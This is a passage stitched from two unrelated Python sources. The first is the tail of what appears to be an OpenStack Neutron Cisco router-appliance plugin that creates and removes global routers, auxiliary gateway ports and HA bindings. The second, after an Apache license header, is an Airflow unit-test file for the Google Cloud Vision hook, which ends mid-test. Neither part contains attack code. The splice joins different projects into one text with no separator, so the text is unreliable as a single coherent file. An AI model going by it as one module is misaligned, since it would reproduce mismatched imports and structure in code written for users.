                HOSTING_DEVICE_ATTR: [gr[HOSTING_DEVICE_ATTR]],
                routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_HA_REDUNDANCY, None]
            }
            invert_filters = {'gw_port_id': [None]}
            num_rtrs = self._l3_plugin.get_routers_count_extended(
                context, filters=filters, invert_filters=invert_filters)
            LOG.debug("Global router %(name)s[%(id)s] with hosting_device "
                      "%(hd)s has %(num)d routers with gw_port set on that "
                      "device",
                      {'name': gr['name'], 'id': gr['id'],
                       'hd': gr[HOSTING_DEVICE_ATTR], 'num': num_rtrs, })
            if num_rtrs == 0:
                LOG.warning(
                    _LW("Global router:%(name)s[id:%(id)s] is present for "
                        "hosting device:%(hd)s but there are no tenant or "
                        "redundancy routers with gateway set on that hosting "
                        "device. Proceeding to delete global router."),
                    {'name': gr['name'], 'id': gr['id'],
                     'hd': gr[HOSTING_DEVICE_ATTR]})
                self._delete_global_router(context, gr['id'])
                filters = {
                    #TODO(bmelande): Filter on routertype of global router
                    #routertype.TYPE_ATTR: [routertype_id],
                    routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
                log_global_routers = self._l3_plugin.get_routers(
                    context, filters=filters)
                if log_global_routers:
                    log_global_router_id = log_global_routers[0]['id']
                    self._delete_global_router(context, log_global_router_id,
                                               logical=True)

    def post_backlog_processing(self, context):
        pass

    # ---------------- Create workflow functions -----------------

    def _conditionally_add_global_router(self, context, tenant_router):
        # We could filter on hosting device id but we don't so we get all
        # global routers for this router type. We can then use that count to
        # determine which ha priority a new global router should get.
        filters = {
            routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
            routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL]}
        global_routers = self._l3_plugin.get_routers(
            context, filters=filters)
        hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
        hosting_device_id = tenant_router[HOSTING_DEVICE_ATTR]
        ext_nw_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
        global_router = hd_to_gr_dict.get(hosting_device_id)
        logical_global_router = self._get_logical_global_router(context,
                                                                tenant_router)
        self._conditionally_add_auxiliary_external_gateway_port(
            context, logical_global_router, ext_nw_id, tenant_router, True)
        if global_router is None:
            # must create global router on hosting device
            global_router = self._create_global_router(
                context, hosting_device_id, hd_to_gr_dict, tenant_router,
                logical_global_router)
        self._conditionally_add_auxiliary_external_gateway_port(
            context, global_router, ext_nw_id, tenant_router)
        self._l3_plugin.add_type_and_hosting_device_info(context,
                                                         global_router)
        for ni in self._l3_plugin.get_notifiers(context, [global_router]):
            if ni['notifier']:
                ni['notifier'].routers_updated(context, ni['routers'])

    def _conditionally_add_auxiliary_external_gateway_port(
            self, context, global_router, ext_net_id, tenant_router,
            provision_ha=False, port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
        # tbe global router may or may not have an interface on the
        # external network that the tenant router uses
        filters = {
            'device_id': [global_router['id']],
            'device_owner': [port_type]}
        connected_nets = {
            p['network_id']: p['fixed_ips'] for p in
            self._core_plugin.get_ports(context, filters=filters)}
        if ext_net_id in connected_nets:
            # already connected to the external network so we're done
            return
        else:
            # not connected to the external network, so let's fix that
            aux_gw_port = self._create_auxiliary_external_gateway_port(
                context, global_router, ext_net_id, tenant_router, port_type)
            if provision_ha:
                self._provision_port_ha(context, aux_gw_port, global_router)

    def _create_auxiliary_external_gateway_port(
            self, context, global_router, ext_net_id, tenant_router,
            port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
        # When a global router is connected to an external network then a
        # special type of gateway port is created on that network. Such a
        # port is called auxiliary gateway ports. It has an ip address on
        # each subnet of the external network. A (logical) global router
        # never has a traditional Neutron gateway port.
        filters = {
            'device_id': [tenant_router['id']],
            'device_owner': [l3_constants.DEVICE_OWNER_ROUTER_GW]}
        # fetch the gateway port of the *tenant* router so we can determine
        # the CIDR of that port's subnet
        gw_port = self._core_plugin.get_ports(context,
                                              filters=filters)[0]
        fixed_ips = self._get_fixed_ips_subnets(context, gw_port)
        global_router_id = global_router['id']
        with context.session.begin(subtransactions=True):
            aux_gw_port = self._core_plugin.create_port(context, {
                'port': {
                    'tenant_id': '',  # intentionally not set
                    'network_id': ext_net_id,
                    'mac_address': bc.constants.ATTR_NOT_SPECIFIED,
                    'fixed_ips': fixed_ips,
                    'device_id': global_router_id,
                    'device_owner': port_type,
                    'admin_state_up': True,
                    'name': ''}})
            router_port = bc.RouterPort(
                port_id=aux_gw_port['id'],
                router_id=global_router_id,
                port_type=port_type)
            context.session.add(router_port)
        return aux_gw_port

    def _create_global_router(
            self, context, hosting_device_id, hd_to_gr_dict, tenant_router,
            logical_global_router):
        r_spec = {'router': {
            # global routers are not tied to any tenant
            'tenant_id': '',
            'name': self._global_router_name(hosting_device_id),
            'admin_state_up': True}}
        global_router, r_hd_b_db = self._l3_plugin.do_create_router(
            context, r_spec, tenant_router[routertype.TYPE_ATTR], False,
            True, hosting_device_id, ROUTER_ROLE_GLOBAL)
        # make the global router a redundancy router for the logical
        # global router (which we treat as a hidden "user visible
        # router" (how's that for a contradiction of terms! :-) )
        with context.session.begin(subtransactions=True):
            ha_priority = (
                ha_db.DEFAULT_MASTER_PRIORITY -
                len(hd_to_gr_dict) * ha_db.PRIORITY_INCREASE_STEP)
            r_b_b = ha_db.RouterRedundancyBinding(
                redundancy_router_id=global_router['id'],
                priority=ha_priority,
                user_router_id=logical_global_router['id'])
            context.session.add(r_b_b)
        return global_router

    def _get_logical_global_router(self, context, tenant_router):
        # Since HA is also enabled on the global routers on each hosting device
        # those global routers need HA settings and VIPs. We represent that
        # using a Neutron router that is never instantiated/hosted. That
        # Neutron router is referred to as the "logical global" router.
        filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
                   routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
        logical_global_routers = self._l3_plugin.get_routers(
            context, filters=filters)
        if not logical_global_routers:
            # must create logical global router
            logical_global_router = self._create_logical_global_router(
                context, tenant_router)
        else:
            logical_global_router = logical_global_routers[0]
            self._update_ha_redundancy_level(context, logical_global_router, 1)
        return logical_global_router

    def _create_logical_global_router(self, context, tenant_router):
        r_spec = {'router': {
            # global routers are not tied to any tenant
            'tenant_id': '',
            'name': self._global_router_name('', logical=True),
            'admin_state_up': True,
            # set auto-schedule to false to keep this router un-hosted
            routertypeawarescheduler.AUTO_SCHEDULE_ATTR: False}}
        # notifications should never be sent for this logical router!
        logical_global_router, r_hd_b_db = (
            self._l3_plugin.do_create_router(
                context, r_spec, tenant_router[routertype.TYPE_ATTR],
                False, True, None, ROUTER_ROLE_LOGICAL_GLOBAL))
        with context.session.begin(subtransactions=True):
            r_ha_s_db = ha_db.RouterHASetting(
                router_id=logical_global_router['id'],
                ha_type=cfg.CONF.ha.default_ha_mechanism,
                redundancy_level=1,
                priority=ha_db.DEFAULT_MASTER_PRIORITY,
                probe_connectivity=False,
                probe_target=None,
                probe_interval=None)
            context.session.add(r_ha_s_db)
        return logical_global_router

    def _get_fixed_ips_subnets(self, context, gw_port):
        nw = self._core_plugin.get_network(context, gw_port['network_id'])
        subnets = [{'subnet_id': s} for s in nw['subnets']]
        return subnets

    def _provision_port_ha(self, context, ha_port, router, ha_binding_db=None):
        ha_group_uuid = uuidutils.generate_uuid()
        router_id = router['id']
        with context.session.begin(subtransactions=True):
            if ha_binding_db is None:
                ha_binding_db = self._get_ha_binding(context, router_id)
            group_id = self.generate_ha_group_id(
                context, router,
                {'device_owner': DEVICE_OWNER_GLOBAL_ROUTER_GW}, ha_binding_db,
                ha_group_uuid)
            r_ha_g = ha_db.RouterHAGroup(
                id=ha_group_uuid,
                tenant_id='',
                ha_type=ha_binding_db.ha_type,
                group_identity=group_id,
                ha_port_id=ha_port['id'],
                extra_port_id=None,
                subnet_id=ha_port['fixed_ips'][0]['subnet_id'],
                user_router_id=router_id,
                timers_config='',
                tracking_config='',
                other_config='')
            context.session.add(r_ha_g)

    def _get_ha_binding(self, context, router_id):
        with context.session.begin(subtransactions=True):
            query = context.session.query(ha_db.RouterHASetting)
            query = query.filter(
                ha_db.RouterHASetting.router_id == router_id)
            return query.first()

    # ---------------- Remove workflow functions -----------------

    def _conditionally_remove_global_router(self, context, tenant_router,
                                            update_operation=False):
        filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
                   routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL],
                   HOSTING_DEVICE_ATTR: [tenant_router[HOSTING_DEVICE_ATTR]]}
        global_routers = self._l3_plugin.get_routers(context,
                                                     filters=filters)
        hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
        if global_routers:
            global_router_id = global_routers[0]['id']
            if not tenant_router or not tenant_router[l3.EXTERNAL_GW_INFO]:
                # let l3 plugin's periodic backlog processing take care of the
                # clean up of the global router
                return
            ext_net_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
            routertype_id = tenant_router[routertype.TYPE_ATTR]
            hd_id = tenant_router[HOSTING_DEVICE_ATTR]
            global_router = hd_to_gr_dict.get(hd_id)
            port_deleted = self._conditionally_remove_auxiliary_gateway_port(
                context, global_router_id, ext_net_id, routertype_id, hd_id,
                update_operation)
            if port_deleted is False:
                # since no auxiliary gateway port was deleted we can
                # abort no since auxiliary gateway port count cannot
                # have reached zero
                return
            filters = {
                'device_id': [global_router_id],
                'device_owner': [DEVICE_OWNER_GLOBAL_ROUTER_GW]}
            num_aux_gw_ports = self._core_plugin.get_ports_count(
                context, filters=filters)
            if num_aux_gw_ports == 0:
                # global router not needed any more so we delete it
                self._delete_global_router(context, global_router_id)
                do_notify = False
            else:
                do_notify = True
            # process logical global router to remove its port
            self._conditionally_remove_auxiliary_gateway_vip_port(
                context, ext_net_id, routertype_id)
            self._l3_plugin.add_type_and_hosting_device_info(context,
                                                             global_router)
            if do_notify is True:
                for ni in self._l3_plugin.get_notifiers(context,
                                                        [global_router]):
                    if ni['notifier']:
                        ni['notifier'].routers_updated(context, ni['routers'])

    def _conditionally_remove_auxiliary_gateway_port(
            self, context, router_id, ext_net_id, routertype_id,
            hosting_device_id, update_operation=False):
        num_rtrs = self._get_gateway_routers_count(
            context, ext_net_id, routertype_id, None, hosting_device_id)
        if ((num_rtrs <= 1 and update_operation is False) or
                (num_rtrs == 0 and update_operation is True)):
            # there are no tenant routers *on ext_net_id* that are serviced by
            # this global router so it's aux gw port can be deleted
            self._delete_auxiliary_gateway_ports(context, router_id,
                                                 ext_net_id)
            return True
        return False

    def _conditionally_remove_auxiliary_gateway_vip_port(
            self, context, ext_net_id, routertype_id):
        filters = {routertype.TYPE_ATTR: [routertype_id],
                   routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
        log_global_routers = self._l3_plugin.get_routers(context,
                                                         filters=filters)
        if not log_global_routers:
            return
        self._update_ha_redundancy_level(context, log_global_routers[0], -1)
        log_global_router_id = log_global_routers[0]['id']
        num_global_rtrs = self._get_gateway_routers_count(
            context, ext_net_id, routertype_id, ROUTER_ROLE_GLOBAL)
        if num_global_rtrs == 0:
            # there are no global routers *on ext_net_id* that are serviced by
            # this logical global router so it's aux gw VIP port can be deleted
            self._delete_auxiliary_gateway_ports(context, log_global_router_id,
                                                 ext_net_id)
        filters[routerrole.ROUTER_ROLE_ATTR] = [ROUTER_ROLE_GLOBAL]
        total_num_global_rtrs = self._l3_plugin.get_routers_count(
            context, filters=filters)
        if total_num_global_rtrs == 0:
            # there are no global routers left that are serviced by this
            # logical global router so it can be deleted
            self._delete_global_router(context, log_global_router_id, True)
        return False

    def _delete_auxiliary_gateway_ports(
            self, context, router_id, net_id=None,
            port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
        filters = {
            'device_id': [router_id],
            'device_owner': [port_type]}
        if net_id is not None:
            filters['network_id'] = [net_id]
        for port in self._core_plugin.get_ports(context, filters=filters):
            try:
                self._core_plugin.delete_port(context, port['id'],
                                              l3_port_check=False)
            except (exc.ObjectDeletedError, n_exc.PortNotFound) as e:
                LOG.warning(e)

    def _delete_global_router(self, context, global_router_id, logical=False):
        # ensure we clean up any stale auxiliary gateway ports
        self._delete_auxiliary_gateway_ports(context, global_router_id)
        try:
            if logical is True:
                # We use parent class method as no special operations beyond
                # what the base implemenation does are needed for logical
                # global router
                super(L3RouterApplianceDBMixin, self._l3_plugin).delete_router(
                        context, global_router_id)
            else:
                self._l3_plugin.delete_router(
                    context, global_router_id, unschedule=False)
        except (exc.ObjectDeletedError, l3.RouterNotFound) as e:
            LOG.warning(e)

    def _get_gateway_routers_count(self, context, ext_net_id, routertype_id,
                                   router_role, hosting_device_id=None):
        # Determine number of routers (with routertype_id and router_role)
        # that act as gateway to ext_net_id and that are hosted on
        # hosting_device_id (if specified).
        query = context.session.query(bc.Router)
        if router_role in [None, ROUTER_ROLE_HA_REDUNDANCY]:
            # tenant router roles
            query = query.join(models_v2.Port,
                               models_v2.Port.id == bc.Router.gw_port_id)
            role_filter = expr.or_(
                l3_models.RouterHostingDeviceBinding.role == expr.null(),
                l3_models.RouterHostingDeviceBinding.role ==
                ROUTER_ROLE_HA_REDUNDANCY)
        else:
            # global and logical global routers
            query = query.join(models_v2.Port,
                               models_v2.Port.device_owner == bc.Router.id)
            role_filter = (
                l3_models.RouterHostingDeviceBinding.role == router_role)
        query = query.join(
            l3_models.RouterHostingDeviceBinding,
            l3_models.RouterHostingDeviceBinding.router_id == bc.Router.id)
        query = query.filter(
            role_filter,
            models_v2.Port.network_id == ext_net_id,
            l3_models.RouterHostingDeviceBinding.router_type_id ==
            routertype_id)
        if hosting_device_id is not None:
            query = query.filter(
                l3_models.RouterHostingDeviceBinding.hosting_device_id ==
                hosting_device_id)
        return query.count()

    # ---------------- General support functions -----------------

    def _update_ha_redundancy_level(self, context, logical_global_router,
                                    delta):
        with context.session.begin(subtransactions=True):
            log_g_router_db = self._l3_plugin._get_router(
                context, logical_global_router['id'])
            log_g_router_db.ha_settings.redundancy_level += delta
            context.session.add(log_g_router_db.ha_settings)

    def _router_name(self, router_id):
        return N_ROUTER_PREFIX + router_id

    def _global_router_name(self, hosting_device_id, logical=False):
        if logical is True:
            return cisco_constants.LOGICAL_ROUTER_ROLE_NAME
        else:
            return '%s-%s' % (cisco_constants.ROUTER_ROLE_NAME_PREFIX,
                              hosting_device_id[-cisco_constants.ROLE_ID_LEN:])

    @property
    def _core_plugin(self):
        return bc.get_plugin()

    @property
    def _l3_plugin(self):
        return bc.get_plugin(bc.constants.L3)

#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock

import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
    AnnotateImageResponse,
    EntityAnnotation,
    SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized

from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id

PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
ANNOTATE_IMAGE_REQUEST = {
    'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
    'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
BATCH_ANNOTATE_IMAGE_REQUEST = [
    {
        'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
        'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
    },
    {
        'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
        'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
    },
]
REFERENCE_IMAGE_NAME_TEST = (
    f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
    f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}


class TestGcpVisionHook(unittest.TestCase):
    def setUp(self):
        with mock.patch(
            'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
            new=mock_base_gcp_hook_default_project_id,
        ):
            self.hook = CloudVisionHook(gcp_conn_id='test')

    @mock.patch(
        "airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
        new_callable=mock.PropertyMock,
    )
    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
    @mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
    def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
        result = self.hook.get_conn()
        mock_client.assert_called_once_with(
            credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
        )
        assert mock_client.return_value == result
        assert self.hook._client == result

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_productset_explicit_id(self, get_conn):
        # Given
        create_product_set_method = get_conn.return_value.create_product_set
        create_product_set_method.return_value = None
        parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        product_set = ProductSet()
        # When
        result = self.hook.create_product_set(
            location=LOC_ID_TEST,
            product_set_id=PRODUCTSET_ID_TEST,
            product_set=product_set,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

        # Then
        # ProductSet ID was provided explicitly in the method call above, should be returned from the method
        assert result == PRODUCTSET_ID_TEST
        create_product_set_method.assert_called_once_with(
            parent=parent,
            product_set=product_set,
            product_set_id=PRODUCTSET_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_productset_autogenerated_id(self, get_conn):
        # Given
        autogenerated_id = 'autogen-id'
        response_product_set = ProductSet(
            name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogenerated_id)
        )
        create_product_set_method = get_conn.return_value.create_product_set
        create_product_set_method.return_value = response_product_set
        parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        product_set = ProductSet()
        # When
        result = self.hook.create_product_set(
            location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
        )
        # Then
        # ProductSet ID was not provided in the method call above. Should be extracted from the API response
        # and returned.
        assert result == autogenerated_id
        create_product_set_method.assert_called_once_with(
            parent=parent,
            product_set=product_set,
            product_set_id=None,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
        # Given
        response_product_set = None
        create_product_set_method = get_conn.return_value.create_product_set
        create_product_set_method.return_value = response_product_set
        parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        product_set = ProductSet()
        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.create_product_set(
                location=LOC_ID_TEST,
                product_set_id=None,
                product_set=product_set,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )
        # Then
        # API response was wrong (None) and thus ProductSet ID extraction should fail.
        err = ctx.value
        assert 'Unable to get name from response...' in str(err)
        create_product_set_method.assert_called_once_with(
            parent=parent,
            product_set=product_set,
            product_set_id=None,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_get_productset(self, get_conn):
        # Given
        name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
        response_product_set = ProductSet(name=name)
        get_product_set_method = get_conn.return_value.get_product_set
        get_product_set_method.return_value = response_product_set
        # When
        response = self.hook.get_product_set(
            location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
        )
        # Then
        assert response
        assert response == MessageToDict(response_product_set)
        get_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_no_explicit_name(self, get_conn):
        # Given
        product_set = ProductSet()
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = product_set
        productset_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
        )
        # When
        result = self.hook.update_product_set(
            location=LOC_ID_TEST,
            product_set_id=PRODUCTSET_ID_TEST,
            product_set=product_set,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )
        # Then
        assert result == MessageToDict(product_set)
        update_product_set_method.assert_called_once_with(
            product_set=ProductSet(name=productset_name),
            metadata=None,
            retry=None,
            timeout=None,
            update_mask=None,
        )

    @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name(
        self, location, product_set_id, get_conn
    ):
        # Given
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = None
        product_set = ProductSet()
        # When
        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product_set(
                location=location,
                product_set_id=product_set_id,
                product_set=product_set,
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )
        err = ctx.value
        assert err
        assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(err)
        update_product_set_method.assert_not_called()

    @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_explicit_name_missing_params_for_constructed_name(
        self, location, product_set_id, get_conn
    ):
        # Given
        explicit_ps_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
        )
        product_set = ProductSet(name=explicit_ps_name)
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = product_set
        # When
        result = self.hook.update_product_set(
            location=location,
            product_set_id=product_set_id,
            product_set=product_set,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )
        # Then
        assert result == MessageToDict(product_set)
        update_product_set_method.assert_called_once_with(
            product_set=ProductSet(name=explicit_ps_name),
            metadata=None,
            retry=None,
            timeout=None,
            update_mask=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_explicit_name_different_from_constructed(self, get_conn):
        # Given
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = None
        explicit_ps_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
        )
        product_set = ProductSet(name=explicit_ps_name)
        template_ps_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
        )
        # When
        # Location and product_set_id are passed in addition to a ProductSet with an explicit name,
        # but both names differ (constructed != explicit).
        # Should throw AirflowException in this case.
        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product_set(
                location=LOC_ID_TEST,
                product_set_id=PRODUCTSET_ID_TEST,
                product_set=product_set,
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )
        err = ctx.value
        # self.assertIn("The required parameter 'project_id' is missing", str(err))
        assert err
        assert (
            ERR_DIFF_NAMES.format(
                explicit_name=explicit_ps_name,
                constructed_name=template_ps_name,
                label="ProductSet",
                id_label="productset_id",
            )
            in str(err)
        )
        update_product_set_method.assert_not_called()

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_delete_productset(self, get_conn):
        # Given
        delete_product_set_method = get_conn.return_value.delete_product_set
        delete_product_set_method.return_value = None
        name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
        # When
        response = self.hook.delete_product_set(
            location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
        )
        # Then
        assert response is None
        delete_product_set_method.assert_called_once_with(name=name, retry=None, timeout=None, metadata=None)

    @mock.patch(
        'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
        **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
    )
    def test_create_reference_image_explicit_id(self, get_conn):
        # Given
        create_reference_image_method = get_conn.return_value.create_reference_image

        # When
        result = self.hook.create_reference_image(
            project_id=PROJECT_ID_TEST,
            location=LOC_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
        )
        # Then
        # Product ID was provided explicitly in the method call above, should be returned from the method
        assert result == REFERENCE_IMAGE_ID_TEST
        create_reference_image_method.assert_called_once_with(
            parent=PRODUCT_NAME,
            reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch(
        'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
        **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
    )
    def test_create_reference_image_autogenerated_id(self, get_conn):
        # Given
        create_reference_image_method = get_conn.return_value.create_reference_image

        # When
        result = self.hook.create_reference_image(
            project_id=PROJECT_ID_TEST,
            location=LOC_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            reference_image=REFERENCE_IMAGE_TEST,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
        )
        # Then
        # Product ID was provided explicitly in the method call above, should be returned from the method
        assert result == REFERENCE_IMAGE_GEN_ID_TEST
        create_reference_image_method.assert_called_once_with(
            parent=PRODUCT_NAME,
            reference_image=REFERENCE_IMAGE_TEST,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_add_product_to_product_set(self, get_conn):
        # Given
        add_product_to_product_set_method = get_conn.return_value.add_product_to_product_set

        # When
        self.hook.add_product_to_product_set(
            product_set_id=PRODUCTSET_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            location=LOC_ID_TEST,
            project_id=PROJECT_ID_TEST,
        )
        # Then
        # Product ID was provided explicitly in the method call above, should be returned from the method
        add_product_to_product_set_method.assert_called_once_with(
            name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
        )

    # remove_product_from_product_set
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_remove_product_from_product_set(self, get_conn):
        # Given
        remove_product_from_product_set_method = get_conn.return_value.remove_product_from_product_set

        # When
        self.hook.remove_product_from_product_set(
            product_set_id=PRODUCTSET_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            location=LOC_ID_TEST,
            project_id=PROJECT_ID_TEST,
        )
        # Then
        # Product ID was provided explicitly in the method call above, should be returned from the method
        remove_product_from_product_set_method.assert_called_once_with(
            name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
    def test_annotate_image(self, annotator_client_mock):
        # Given
        annotate_image_method = annotator_client_mock.annotate_image

        # When
        self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST)
        # Then
